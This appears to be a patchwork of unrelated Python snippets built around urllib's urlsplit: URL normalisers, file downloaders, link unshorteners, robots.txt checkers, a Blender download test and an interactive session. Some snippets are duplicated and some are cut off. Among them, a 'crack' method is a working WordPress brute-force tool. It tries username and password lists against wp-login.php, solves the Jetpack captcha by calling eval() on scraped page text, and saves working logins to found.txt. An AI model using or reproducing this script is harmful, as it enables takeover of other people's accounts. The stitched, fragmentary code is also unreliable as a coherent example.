def normalize_url(url, base_url=None): """ Returns a normalized url. If URL scheme is missing the 'file' scheme is set. :param url: An relative or absolute URL. :param base_url: A reference base URL to join. :return: A normalized URL. """ url_parts = urlsplit(url) if url_parts.scheme and url_parts.scheme in uses_relative: return url_parts.geturl() elif base_url is None: pathname = os.path.abspath(url_parts.geturl()) return urljoin(u'file:', pathname2url(pathname)) else: base_url_parts = urlsplit(base_url) if base_url_parts.scheme and base_url_parts.scheme in uses_relative: return urlunsplit((base_url_parts.scheme, base_url_parts.netloc, os.path.join(base_url_parts.path, pathname2url(url)), base_url_parts.query, base_url_parts.fragment)) else: pathname = os.path.abspath(os.path.join(base_url, url)) url_parts = urlsplit(pathname2url(pathname)) if url_parts.scheme and url_parts.scheme in uses_relative: return url_parts.geturl() else: return urljoin(u'file:', url_parts.geturl())
def print_some_url(url, return_string=True): message = f"hello{pathsep*2}human" loc = req.urlsplit(url).netloc output = f"{message}, welcome to {loc}" print(output) if return_string: return output
def load_resource(url): """ Load resource from an URL, decoding into a UTF-8 string. :param url: Resource URLs. :return: Resource as unicode string ad the loaded URL. """ msg = "cannot load resource from %r: %s" try: source = urlopen(normalize_url(url)) except URLError as err: raise XMLSchemaURLError(reason=msg % (url, err.reason)) else: try: data = source.read() except (OSError, IOError) as err: raise XMLSchemaOSError(msg % (url, err)) finally: source.close() if PY3: try: return data.decode('utf-8'), url except UnicodeDecodeError: return data.decode('iso-8859-1'), url else: try: return data.encode('utf-8'), url except UnicodeDecodeError: import codecs with codecs.open(urlsplit(url).path, mode='rb', encoding='iso-8859-1') as text_file: return text_file.read().encode('iso-8859-1'), url
def wait(self, url): domain = urlsplit(url).netloc last_accessed = self.domains.get(domain) if self.delay > 0 and last_accessed is not None: sleep_secs = self.delay - (datetime.now() - last_accessed).seconds if sleep_secs > 0: time.sleep(sleep_secs) self.domains[domain] = datetime.now()
def query_splitter(url): from attrdict import AttrDict from collections import OrderedDict query = attrgetter('query')(urlsplit(url)) dic = urlparse(url)._asdict() _query = itemgetter('query')(dic) print(OrderedDict([q.split('=') for q in _query.split('&')])['text']) return AttrDict(OrderedDict([q.split('=') for q in query.split('&')]))
def url_to_path(self, url): compents = urlsplit(url) path = compents.path # url目录路径如.com/后面可能是空的 if not path: path = '/index.html' elif path.endswith('/'): path += 'index.html' filename = compents.netloc + path + compents.query # 文件名可能包含系统不支持的字符,如* >等符号,需替换掉 filename = re.sub('[^0-9a-zA-Z\-.,;_]', '_', filename) return os.path.join(self.cache_dir, filename)
def crack(self): print('%s\t[info]%s total site: %d' % (h, p, len(self.site))) print('%s\t[info]%s total wordlist u/p: %d' % (h, p, min([len(self.a), len(self.b)]))) for site in self.site: requests.headers.update({'user-agent': random.choice(ua)}) parse = urlsplit(site) netloc = parse.netloc scheme = parse.scheme print('%s[info]%s cracking: %s' % (br, p, netloc)) for a, b in zip(self.a, self.b): try: data = {} url = '%s://%s/wp-login.php' % (scheme, netloc) cek = requests.get(url) if cek.status_code != 200: print('%s[info]%s path wp-login not found ' % (m, p)) continue for c, d in re.findall(r'name="(.*?)".*?value="(.*?)"', cek.text): data.update({c: d}) if 'jetpack_protect_num' in cek.text.lower(): info = re.findall(r'\n\t\t\t\t\t(.*?)=.*?\t\t\t\t', cek.text)[0].split(' ') iok = (''.join(info)).replace('x', '*').replace( ' ', '') value = str(eval(iok)) print('%s[info]%s User Di Curigai !!!' % (m, p)) print('%s[info]%s Bypass chapta %s = %s%s' % (m, p, iok, h, value)) data.update({'jetpack_protect_num': value}) else: pass data.update({'log': a, 'pwd': b}) req = requests.post(url, data=data).text.lower() if 'dashboard' in req: self.v += 1 print(' %s[Success] %s: %s > %s , %s' % (h, p, url, a, b)) open('found.txt', 'a').write(url + '> %s | %s \n' % (a, b)) break else: print(' %s[Failed] %s%s , %s' % (m, p, a, b)) continue except: print('%s[info] %sError gan ..' % (m, p)) continue quit('%s[%s@%s]%s selesai total %s save to found.txt' % (br, m, br, p, self.v))
def download(url, path="./"): # Check if download dir exists if not os.path.isdir(path): os.mkdir(path) # Download the file from `url` and save it locally under `file_name`: split = urlsplit(url) file_name = split.path.split("/")[-1] path = path + file_name if not os.path.isfile(path): file_name, headers = urlretrieve(url, path, reporthook=reporthook) print("\nDownload complete!") return path
def down_parse_html(url): """ download html and parse it with lxml.html :param url: string :return: lxml html parsed document """ request = urlopen(Request(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:10.0.1) ' 'Gecko/20100101 Firefox/10.0.1'})) encoding = request.headers.get_content_charset() data = request.read().decode(encoding if encoding else 'utf-8') doc = html.fromstring(data) doc.make_links_absolute('{0.scheme}://{0.netloc}'.format(urlsplit(url))) return doc
def __download_file(self, name, libname, url, download_path): # try to detect already downloaded file (version, exists) = self.__detect_existing_download(libname, download_path) if not exists: # download new local version try: # urlgrabber follows redirects better than using burllib directly local_file = urlgrabber.urlopen( url) # use urlgrabber to open the url actual_url = local_file.url # detects the actual filename of the redirected url values = urlsplit(actual_url) # split the url up into bits filepath = Path(values[2].decode( 'UTF-8')) # part 2 is the file name section of the url filename = filepath.name # just extract the file name. except urlgrabber.grabber.URLGrabError as error: self.print_message(str(error)) self.print_message( _('Started downloading {}').format(download_path, filename)) download_file = download_path / filename extract_path = self.download_path / name extract_path.mkdir(parents=True, exist_ok=True) self.__download_remote_file(local_file, download_file) self.__decompress(filename, download_file, download_path, extract_path) self.print_message(_('Completed download of {}.').format(filename)) else: # check existing local version against download version (f_major, f_minor, f_build) = self.__detect_library_version(version) (d_major, d_minor, d_build) = self.__detect_download_version(filename) if (d_major > f_major or d_minor > f_minor or d_build > f_build): # download replacement if newer self.print_message( _('Started downloading {} to replace earlier version'). format(download_path, filename)) download_file = download_path / filename extract_path = self.download_path / name extract_path.mkdir(parents=True, exist_ok=True) self.__download_remote_file(local_file, download_file) self.__decompress(filename, download_file, download_path, extract_path) self.print_message( _('Completed download of {} of replacement version.'). format(filename))
def unshorten(self, uri, type=None, timeout=10): domain = urlsplit(uri).netloc self._timeout = timeout if not domain: return uri, INVALID_URL_ERROR_CODE if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly': return self._unshorten_adfly(uri) if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type =='adfocus': return self._unshorten_adfocus(uri) if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks': if linkbucks_support: return self._unshorten_linkbucks(uri) else: return uri, 'linkbucks.com not supported. Install selenium package to add support.' if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu': return self._unshorten_lnxlu(uri) if re.search(self._shst_regex, domain, re.IGNORECASE): return self._unshorten_shst(uri) if re.search(self._hrefli_regex, domain, re.IGNORECASE): return self._unshorten_hrefli(uri) if re.search(self._anonymz_regex, domain, re.IGNORECASE): return self._unshorten_anonymz(uri) try: # headers stop t.co from working so omit headers if this is a t.co link if domain == 't.co': r = requests.get(uri, timeout=self._timeout) return r.url, r.status_code # p.ost.im uses meta http refresh to redirect. if domain == 'p.ost.im': r = requests.get(uri, headers=self._headers, timeout=self._timeout) uri = re.findall(r'.*url\=(.*?)\"\.*',r.text)[0] return uri, 200 try: r = requests.head(uri, headers=self._headers, timeout=self._timeout) except (requests.exceptions.InvalidSchema, requests.exceptions.InvalidURL): return uri, -1 else: while True: if 'location' in r.headers: r = requests.head(r.headers['location']) uri = r.url else: return r.url, r.status_code except Exception as e: return uri, str(e)
def unshorten(self, uri, type=None, timeout=10): domain = urlsplit(uri).netloc self._timeout = timeout if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly': return self._unshorten_adfly(uri) if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == 'adfocus': return self._unshorten_adfocus(uri) if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks': if linkbucks_support: return self._unshorten_linkbucks(uri) else: return uri, 'linkbucks.com not supported. Install selenium package to add support.' if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu': return self._unshorten_lnxlu(uri) if re.search(self._shst_regex, domain, re.IGNORECASE): return self._unshorten_shst(uri) try: # headers stop t.co from working so omit headers if this is a t.co link if domain == 't.co': r = requests.get(uri, timeout=self._timeout) return r.url, r.status_code # p.ost.im uses meta http refresh to redirect. if domain == 'p.ost.im': r = requests.get(uri, headers=self._headers, timeout=self._timeout) uri = re.findall(r'.*url\=(.*?)\"\.*', r.text)[0] return uri, 200 r = requests.head(uri, headers=self._headers, timeout=self._timeout) while True: if 'location' in r.headers: r = requests.head(r.headers['location']) uri = r.url else: return r.url, r.status_code except Exception as e: return uri, str(e)
def __init__(self, base, auth=None): self.auth = auth self.headers = {'User-Agent': 'foobar'} self.context = init_ssl() self.jar = CookieJar() split = urlsplit(base) self.base = '{}://{}'.format(split.scheme, split.netloc) if self.auth: auth = ':'.join(self.auth) if sys.version_info >= (3,): basic = base64.b64encode(auth.encode('ascii')).decode('ascii') else: basic = base64.b64encode(auth) self.headers['Authorization'] = 'Basic {}'.format(basic) self._get_crumb()
def connect(url: str) -> tuple: """ Connect to the given url and extract the html.\n :param url: """ year = urlsplit(url).netloc.split('.')[0] try: headers = dict() headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 " \ "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib.request.Request(url, headers=headers) with urllib.request.urlopen(req) as response: page = codecs.decode(response.read()) return page, int(year) except urllib.request.URLError as e: print(f"The following error had raise while trying to connect to {url}\n") print(e) sys.exit()
def isNeededUrl(url): neededUrl = True fileName = (((urlsplit(url).path).lower()).split("/"))[-1] if(fileName in comm.undesiredFileName): neededUrl = False if(neededUrl): extSplit = (fileName.split(".")) lastIndex = len(extSplit)-1 if(lastIndex > 0): extension = (extSplit[lastIndex]) if(extension in comm.undesiredFileExtensions): neededUrl = False if(neededUrl): for udft in comm.undesiredFileTypes: if(udft in url): neededUrl = False break return neededUrl
def checkcrolling(url): urlspli = request.urlsplit(url) netloc = urlspli.netloc path = urlspli.path robots = urlspli.scheme + "://" + netloc + "/robots.txt" response = request.urlopen(robots) wrapper = io.TextIOWrapper(response, 'utf-8') read = wrapper.read() if read.startswith("User-agent"): disallowlist = [ string[string.index(":") + 1::].strip(" ") for string in read.split("\n") if string.startswith("Disallow") ] disallowlist.append("/") if "/" in disallowlist: return False return path in disallowlist else: return False
def redirected(self, req, fp, code, msg, headers): note.yellow("being redirected",code,msg,headers.get("location")) note(headers) if 'set-cookie' in headers: import time parts = headers['set-cookie'].split(";") n,v = parts[0].split("=",1) url = urllib.urlsplit(req.url) c = { 'name': n.strip(), 'value': v.strip(), 'domain': split_port(url.netloc)[1], 'creationTime': time.time() } for part in parts[1:]: part = part.split("=",1) if len(part) == 1: c[part[0].strip] = True else: c[part[0].strip()] = part[1].strip() jar.set_cookie(c)
def unshorten(self, uri, type=None, timeout=10): domain = urlsplit(uri).netloc self._timeout = timeout if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == "adfly": return self._unshorten_adfly(uri) if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == "adfocus": return self._unshorten_adfocus(uri) if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == "linkbucks": if linkbucks_support: return self._unshorten_linkbucks(uri) else: return uri, "linkbucks.com not supported. Install selenium package to add support." if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == "lnxlu": return self._unshorten_lnxlu(uri) if re.search(self._shst_regex, domain, re.IGNORECASE): return self._unshorten_shst(uri) try: # headers stop t.co from working so omit headers if this is a t.co link if domain == "t.co": r = requests.get(uri, timeout=self._timeout) return r.url, r.status_code # p.ost.im uses meta http refresh to redirect. if domain == "p.ost.im": r = requests.get(uri, headers=self._headers, timeout=self._timeout) uri = re.findall(r".*url\=(.*?)\"\.*", r.text)[0] return uri, 200 r = requests.head(uri, headers=self._headers, timeout=self._timeout) while True: if "location" in r.headers: r = requests.head(r.headers["location"]) uri = r.url else: return r.url, r.status_code except Exception as e: return uri, str(e)
def url2name(url): return basename(urlsplit(url)[2])
from tqdm import tqdm import aigym.dataset from aigym.conf.settings import RAW_DATASETS_DIR arg_parser = ArgumentParser('aigym.dataset') arg_parser.add_argument('-download', metavar='url', help="download dataset file from url") arg_parser.add_argument('-prepare', metavar='dataset name', help="prepares dataset specified by name") parsed_args = arg_parser.parse_args() if parsed_args.download: source = urlopen(parsed_args.download) filename = os.path.split(urlsplit(parsed_args.download).path)[-1] with open(os.path.join(RAW_DATASETS_DIR, filename), 'wb') as file: for byte in tqdm(source.read(), desc='Downloading from {}'.format( parsed_args.download)): file.write(pack('B', byte)) if parsed_args.prepare: cls = getattr(aigym.dataset, "{}RawDataset".format(parsed_args.prepare.title()), None) if cls is not None: cls().prepare()
def basename(self) -> str: return Path(request.urlsplit(self._url)[2]).name
FILE c:\python37\lib\urllib\__init__.py >>> import urllib2 Traceback (most recent call last): File "<pyshell#10>", line 1, in <module> import urllib2 ModuleNotFoundError: No module named 'urllib2' >>> import urllib.request as request >>> dir(request) ['AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler', 'ContentTooShortError', 'DataHandler', 'FTPHandler', 'FancyURLopener', 'FileHandler', 'HTTPBasicAuthHandler', 'HTTPCookieProcessor', 'HTTPDefaultErrorHandler', 'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor', 'HTTPHandler', 'HTTPPasswordMgr', 'HTTPPasswordMgrWithDefaultRealm', 'HTTPPasswordMgrWithPriorAuth', 'HTTPRedirectHandler', 'HTTPSHandler', 'MAXFTPCACHE', 'OpenerDirector', 'ProxyBasicAuthHandler', 'ProxyDigestAuthHandler', 'ProxyHandler', 'Request', 'URLError', 'URLopener', 'UnknownHandler', '__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', '__version__', '_cut_port_re', '_ftperrors', '_have_ssl', '_localhost', '_noheaders', '_opener', '_parse_proxy', '_proxy_bypass_macosx_sysconf', '_randombytes', '_safe_gethostbyname', '_thishost', '_url_tempfiles', 'addclosehook', 'addinfourl', 'base64', 'bisect', 'build_opener', 'contextlib', 'email', 'ftpcache', 'ftperrors', 'ftpwrapper', 'getproxies', 'getproxies_environment', 'getproxies_registry', 'hashlib', 'http', 'install_opener', 'io', 'localhost', 'noheaders', 'os', 'parse_http_list', 'parse_keqv_list', 'pathname2url', 'posixpath', 'proxy_bypass', 'proxy_bypass_environment', 'proxy_bypass_registry', 'quote', 're', 'request_host', 'socket', 'splitattr', 'splithost', 'splitpasswd', 'splitport', 'splitquery', 'splittag', 'splittype', 'splituser', 'splitvalue', 'ssl', 'string', 'sys', 'tempfile', 'thishost', 'time', 'to_bytes', 'unquote', 'unquote_to_bytes', 'unwrap', 'url2pathname', 'urlcleanup', 'urljoin', 'urlopen', 'urlparse', 'urlretrieve', 'urlsplit', 'urlunparse', 'warnings'] >>> dir(urllib.response) ['__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'addbase', 'addclosehook', 'addinfo', 'addinfourl', 'tempfile'] >>> url = "https://www.google.com" >>> sp = request.urlsplit() Traceback (most recent call last): File "<pyshell#15>", line 1, in <module> sp = request.urlsplit() TypeError: urlsplit() missing 1 required positional argument: 'url' >>> sp = request.urlsplit(url) >>> sp SplitResult(scheme='https', netloc='www.google.com', path='', query='', fragment='') >>> sp[0] 'https' >>> sp[1] 'www.google.com' >>> sp[2] '' >>> url1="https://stackoverflow.com/questions/34475051/need-to-install-urllib2-for-python-3-5-1" >>> sp = request.urlsplit(url1)
def test_get_legacy_release_download_url(blender_version, operative_system, bits, arch): blender_Version = BlenderVersion(blender_version) if blender_Version < BlenderVersion(MINIMUM_VERSION_SUPPPORTED): mocked_stderr = io.StringIO() with pytest.raises(SystemExit): with contextlib.redirect_stderr(mocked_stderr): get_legacy_release_download_url(blender_version, operative_system, bits, arch) assert mocked_stderr.getvalue() == ( "The minimum version supported by blender-downloader is" f" {MINIMUM_VERSION_SUPPPORTED}.\n") return url = get_legacy_release_download_url(blender_version, operative_system, bits, arch) expected_url_start = "https://download.blender.org/release/Blender" assert url.startswith(expected_url_start) major_minor_blender_version = re.sub( r"[a-zA-Z]", "", ".".join(blender_version.split(".")[:2])) def assert_url(url_end_schema): url_end = url_end_schema if "{blender_version}" in url_end: if "{bits}" in url_end: url_end = url_end.format( blender_version=blender_version, bits=bits, ) else: url_end = url_end.format(blender_version=blender_version) if "{bits}" in url_end: url_end = url_end.format(bits=bits) assert url == ( f"{expected_url_start}{major_minor_blender_version}/blender-{url_end}" ) if operative_system == "macos": if blender_Version >= BlenderVersion("2.93"): if arch in ["x64", "arm64"]: assert_url(f"{blender_version}-macos-{arch}.dmg") else: assert_url("{blender_version}-macos-x64.dmg") elif blender_Version >= BlenderVersion( "2.83.14") and blender_Version < BlenderVersion("2.84"): assert_url("{blender_version}-macos-x64.dmg") elif blender_Version > BlenderVersion("2.79"): assert_url("{blender_version}-macOS.dmg") elif blender_Version == BlenderVersion("2.79"): assert_url("{blender_version}-macOS-10.6.tar.gz") elif blender_Version == BlenderVersion("2.71"): if bits == 32: assert_url("{blender_version}-OSX_10.6-j2k-fix-i386.zip") else: assert_url("{blender_version}-OSX_10.6-j2k-fix-x86_64.zip") elif blender_Version < BlenderVersion("2.60"): if bits == 32: assert_url("{blender_version}-OSX_10.5_i386.zip") else: assert_url("{blender_version}-OSX_10.5_x86_64.zip") elif blender_Version == BlenderVersion("2.60"): if bits == 32: assert_url("{blender_version}-OSX_10.5_i386.zip") else: assert_url("{blender_version}-OSX_10.6_x86_64.zip") elif blender_Version < BlenderVersion("2.64"): if bits == 32: assert_url("{blender_version}-release-OSX_10.5_i386.zip") else: assert_url("{blender_version}-release-OSX_10.5_x86_64.zip") elif blender_Version < BlenderVersion("2.65"): if bits == 32: assert_url("{blender_version}-release-OSX_10.6_i386.zip") else: assert_url("{blender_version}-release-OSX_10.6_x86_64.zip") elif blender_Version < BlenderVersion("2.71"): if bits == 32: assert_url("{blender_version}-OSX_10.6-i386.zip") else: assert_url("{blender_version}-OSX_10.6-x86_64.zip") elif blender_Version < BlenderVersion("2.79"): assert_url("{blender_version}-OSX_10.6-x86_64.zip") else: # BlenderVersion("2.71") < blender_Version < BlenderVersion("2.79") if bits == 32: assert_url("{blender_version}-OSX_10.6-i386.zip") else: assert_url("{blender_version}-OSX_10.6-x86_64.zip") elif operative_system == "windows": if blender_Version >= BlenderVersion("2.93"): assert_url("{blender_version}-windows-x64.zip") elif blender_Version >= BlenderVersion( "2.83.14") and blender_Version < BlenderVersion("2.84"): assert_url("{blender_version}-windows-x64.zip") elif blender_Version > BlenderVersion("2.80"): assert_url("{blender_version}-windows64.zip") elif blender_Version > BlenderVersion("2.65"): assert_url("{blender_version}-windows{bits}.zip") elif blender_Version > BlenderVersion("2.60"): assert_url("{blender_version}-release-windows{bits}.zip") else: # blender_Version < BlenderVersion("2.61") assert_url("{blender_version}-windows{bits}.zip") else: # operative_system == "linux": if blender_Version >= BlenderVersion("2.93"): assert_url("{blender_version}-linux-x64.tar.xz") elif blender_Version >= BlenderVersion( "2.83.14") and blender_Version < BlenderVersion("2.84"): assert_url("{blender_version}-linux-x64.tar.xz") elif blender_Version > BlenderVersion("2.81"): assert_url("{blender_version}-linux64.tar.xz") elif blender_Version == BlenderVersion("2.81"): assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2") elif blender_Version == BlenderVersion("2.80"): if bits == 32: assert_url("{blender_version}-linux-glibc224-i686.tar.bz2") else: assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2") elif blender_Version == BlenderVersion("2.79"): if bits == 32: assert_url("{blender_version}-linux-glibc219-i686.tar.bz2") else: assert_url("{blender_version}-linux-glibc219-x86_64.tar.bz2") elif blender_Version < BlenderVersion("2.65"): if bits == 32: assert_url("{blender_version}-linux-glibc27-i686.tar.bz2") else: assert_url("{blender_version}-linux-glibc27-x86_64.tar.bz2") else: # BlenderVersion("2.64") < blender_Version < BlenderVersion("2.79") if bits == 32: assert_url("{blender_version}-linux-glibc211-i686.tar.bz2") else: assert_url("{blender_version}-linux-glibc211-x86_64.tar.bz2") # check that filetype is supported for extraction extension = os.path.splitext(os.path.basename(urlsplit(url).path))[1] assert extension in SUPPORTED_EXTENSIONS_FOR_EXTRACTION
return True if self.index > other.index: return True return False def __eq__(self, other): if self.index == other.index: return True file_info_list = [] input_json = input() parsed_json = json.loads(input_json) i = 0 for element in parsed_json: url = element["url"] split_result = request.urlsplit(url) file_name = split_result[2] if file_name == "/": file_name = "index.html" file_info_list.append(FileInfo(url, file_name, i)) i += 1 file_info_list.sort() password = "" for file_info in file_info_list: password += file_info.md5 print(password)
import requests from bs4 import BeautifulSoup from urllib.request import urlsplit general = 'https://afteegypt.org/blocked-websites-list?lang=en' afteegypt = requests.get(general) parse = BeautifulSoup(afteegypt.content, "html5lib") blocked_websties = [] for table in parse.find_all('table'): for tr in table.findAll('tr', attrs={'style': 'height: 26px;'}): for anchor in tr.findAll('a'): url = urlsplit(anchor.get('href')).netloc blocked_websties.append(url) # Second half of the tables for td1 in table.findAll( 'td', attrs= { 'style': 'background-color: #faf2f2; text-align: center; height: 26px; width: 214px;', 'colspan': '2' }): v = td1.renderContents() for x in str(v.decode('utf-8')).replace('<br/>', '').split(): blocked_websties.append(x) # First half of the tables
def normalize(uri): return urlsplit(uri).geturl()
def download_release(download_url, output_directory, quiet=False): """Downloads the release file from Blender official repository. Parameters ---------- download_url : str URL of the file to download. output_directory : str Path to the directory in which the downloaded file will be stored. """ try: # get filename of downloaded file (maybe a zip, maybe a dmg...) output_filename = os.path.basename(urlsplit(download_url).path) output_filepath = os.path.join(output_directory, output_filename) if os.path.isfile(output_filepath): sys.stderr.write( f"There is already a file named as '{output_filename}' in the" " directory in which Blender will be downloaded.\nPlease, remove" " the file before execute blender-downloader.\n") sys.exit(1) # create temporal blender-downloader directory if not exists to store # extracted files if not os.path.isdir(TEMPDIR): os.mkdir(TEMPDIR) tmp_output_filepath = os.path.join(TEMPDIR, output_filename) chunksize = 8192 downloaded_size = chunksize res = urlopen(Request(download_url)) total_size_bits = int(res.info()["Content-Length"]) progress_bar_kwargs = dict( total=total_size_bits, unit="B", desc=f"Downloading '{output_filename}'", unit_scale=True, unit_divisor=1000, miniters=1, disable=quiet, initial=chunksize, # first chunk is written before entering while ) with tqdm(**progress_bar_kwargs) as progress_bar, open( tmp_output_filepath, "wb") as f: data = res.read(chunksize) f.write(data) while data: data = res.read(chunksize) f.write(data) progress_bar.update(chunksize) downloaded_size += chunksize if downloaded_size >= total_size_bits: break except KeyboardInterrupt: sys.stderr.write("Download interrupted\n") if os.path.isfile(tmp_output_filepath): os.remove(tmp_output_filepath) sys.exit(1) # move from temporal directory to the real output path os.rename(tmp_output_filepath, output_filepath) return output_filepath
from urllib import request import io url = "http://www.daum.net/robots.txt" response = request.urlopen(url) string = request.urlsplit(url) print(response) aa = io.TextIOWrapper(response, 'utf-8') bb = aa.read() print(bb.startswith("User-agent")) list = [ string[string.index(":") + 1::].strip(" ") for string in bb.split("\n") if string.startswith("Disallow") ] print(list) def checkcrolling(url): urlspli = request.urlsplit(url) netloc = urlspli.netloc path = urlspli.path robots = urlspli.scheme + "://" + netloc + "/robots.txt" response = request.urlopen(robots) wrapper = io.TextIOWrapper(response, 'utf-8') read = wrapper.read() if read.startswith("User-agent"): disallowlist = [ string[string.index(":") + 1::].strip(" ") for string in read.split("\n") if string.startswith("Disallow") ]